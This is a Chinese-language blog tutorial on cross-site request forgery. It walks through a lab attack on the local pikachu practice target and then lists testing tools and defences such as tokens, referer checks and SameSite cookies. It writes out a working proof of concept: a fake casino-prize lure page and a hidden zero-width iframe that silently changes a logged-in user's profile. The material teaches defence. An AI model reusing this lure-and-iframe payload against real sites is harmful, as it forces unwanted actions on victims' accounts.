网络安全-跨站请求伪造（CSRF）的原理、攻击及防御

逃离我推掉我的手 2022-11-25 10:19 283阅读 0赞

**目录**

简介

原理

举例

漏洞发现

链接及请求伪造

CSRF攻击

不同浏览器

未登录状态

登录状态

代码查看

工具

防御

用户

程序员

--------------------

# 简介 #

**跨站请求伪造**（Cross-site request forgery），也被称为 **one-click attack** 或者 **session riding**，通常缩写为 **CSRF** 或者 **XSRF**， 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨站脚本（XSS）相比，**XSS** 利用的是用户对指定网站的信任，CSRF 利用的是网站对用户网页浏览器的信任。

# 原理 #

构造链接，黑客在自己的网站或邮箱等引诱已登录用户点击按钮等，来请求想要攻击的网站，浏览器会携带已登录用户的Cookie去访问黑客想要攻击的网站。CSRF攻击利用网站对于用户网页浏览器的信任。

# 举例 #

## 漏洞发现 ##

使用靶机:[pikachu][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70][] CSRF(get)

使用vince 123456登录

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 1][] 登录后查看

点击修改个人信息

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 2][] 修改

> [http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf\_get\_edit.php?sex=%E5%A5%B3&phonenum=13098763456&add=beijing&email=vince@qq.com&submit=submit][http_127.0.0.1_pikachu_vul_csrf_csrfget_csrf_get_edit.php_sex_E5_A5_B3_phonenum_13098763456_add_beijing_email_vince_qq.com_submit_submit]

抓包发现链接如上，存在CSRF漏洞。

## 链接及请求伪造 ##

click.html

<html>
    	<head>
    		<title>
    			澳门皇家赌场上线啦！！！
    		</title>
    	</head>
    	<body>
    		<a href="requestforgery.html">美女荷官免费送100万，点击领取！！！</a>
    	</body>
    </html>

requestforgery.html

<html>
    	<head>
    		<title>
    			领奖平台！！！
    		</title>
    	</head>
    	<body>
    		<p>请邮箱查收</p>
    		<iframe/ src="http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=%E5%A5%B3&phonenum=13098763456&add=shanghai&email=vince@qq.com&submit=submit" frameborder="0" width="0px">
    	</body>
    </html>

修改地址即add参数为shanghai。

## CSRF攻击 ##

### 不同浏览器 ###

pikachu登录是使用火狐，以下点击是使用谷歌。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 3][] 恶意链接

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 4][] 跳转至请求伪造界面

界面刷新后没有问题

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 5][] 界面刷新

### 未登录状态 ###

点击退出登录

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 6][] 点击退出登录

使用火狐浏览器（网站同一浏览器）进行访问。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 7][] 恶意链接

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 8][] 请求伪造

登录后查看，未改变。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 9][] 未改变

###  登录状态 ###

登录后重复上述操作，攻击成功！！！

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 10][] 攻击成功，地址修改

### 代码查看 ###

pikachu\\vul\\csrf\\csrfget\\csrf\_get\_login.php

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 11][] session保存

使用session保存的，没有验证码或token。

# 工具 #

[deemon][]

[csrftester与burpsuite][csrftester_burpsuite]

[csrf-scanner(闭源)][csrf-scanner]

# 防御 #

## 用户 ##

通过简介就可以看出用户可以做的防御措施

*  不登录（用户使用网站应该会登录，登录时可以更换浏览器或选择浏览器模式）
 *  不点击恶意链接
 *  使用特殊网站时单独用一个浏览器

## 程序员 ##

*  验证码

这个比较常见，我就不多说了，目前各种验证码都有可能通过机器学习等方式进行破解。

*  referer

请求头带的，可以标识来源。

*  token

token是常用的一种方式，通过设置过期时间进行刷新，在文章[django-rest-framework-jwt与django-rest-framework-simplejwt的对比及使用][django-rest-framework-jwt_django-rest-framework-simplejwt]中有对比python中两种JWT包，当时博主在学REST API。

*  二次验证

在进行修改密码，钱财业务等敏感操作时再次核验身份，通过手机短信，面部识别等

\-----------------------------------------2021年9月1日更新------------------------------------------

*  Same Site Cookie

由Google提出的[草案][Link 1]，在原有的Cookie中，新添加了一个`SameSite`属性，它标识着在非同源的请求中，是否可以带上Cookie，它可以设置为3个值，分别为：

1.  Strict
2.  Lax
3.  None

[CORS与CSRF][CORS_CSRF]

\-------------------------------------2021年9月1日更新完毕---------------------------------------

若存在xss攻击，则没有必要防御CSRF了，因为网站已经不安全，可以通过XSS获取cookie、token等，换浏览器或在浏览器层面防御也就没有意义了。

b站视频：[恶意链接是怎么对你攻击的（CSRF讲解）][CSRF]

更多内容查看：[网络安全-自学笔记][-]

喜欢本文的请动动小手点个赞，收藏一下，有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。如果您感觉有所收获，自愿打赏，可选择支付宝18833895206（小于），您的支持是我不断更新的动力。

[pikachu]: https://github.com/zhuifengshaonianhanlu/pikachu
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70]: /images/20221124/26210584e02b4397847eff511b9f790f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 1]: /images/20221124/f738206106014e5fb285b1dd5632ee35.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 2]: /images/20221124/aeb66402444b444890890c81cefcbf4f.png
[http_127.0.0.1_pikachu_vul_csrf_csrfget_csrf_get_edit.php_sex_E5_A5_B3_phonenum_13098763456_add_beijing_email_vince_qq.com_submit_submit]: http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=%E5%A5%B3&phonenum=&add=&email=&submit=submit
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 3]: /images/20221124/b1033fd2c4134e90ac26076ad30fcaa0.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 4]: /images/20221124/c93f11522c58488882832cd2b74544cf.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 5]: /images/20221124/79f1dfa744b24baea299daef71020022.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 6]: /images/20221124/95104fde83ea44458d1231c4b3a33370.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 7]: /images/20221124/82ba2154e7744e09a95c1ac48d5ec3d9.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 8]: /images/20221124/c3e8f7ea49794d07819072e5535af9e3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 9]: /images/20221124/7b8f81c0b2b7450da39a30e130b285b9.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 10]: /images/20221124/966d2ef4be384d8b9db2a8ccf1ee7f58.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 11]: /images/20221124/44e47e118c1141858a84524a426392cd.png
[deemon]: https://github.com/tgianko/deemon/
[csrftester_burpsuite]: https://blog.csdn.net/Later_future/article/details/106169877
[csrf-scanner]: https://security.tencent.com/index.php/blog/msg/24
[django-rest-framework-jwt_django-rest-framework-simplejwt]: https://blog.csdn.net/lady_killer9/article/details/103075076
[Link 1]: https://www.cnblogs.com/ziyunfei/p/5637945.html
[CORS_CSRF]: https://blog.csdn.net/weixin_34318272/article/details/91670005
[CSRF]: https://www.bilibili.com/video/BV1YU4y1p7bJ
[-]: https://blog.csdn.net/lady_killer9/article/details/106791542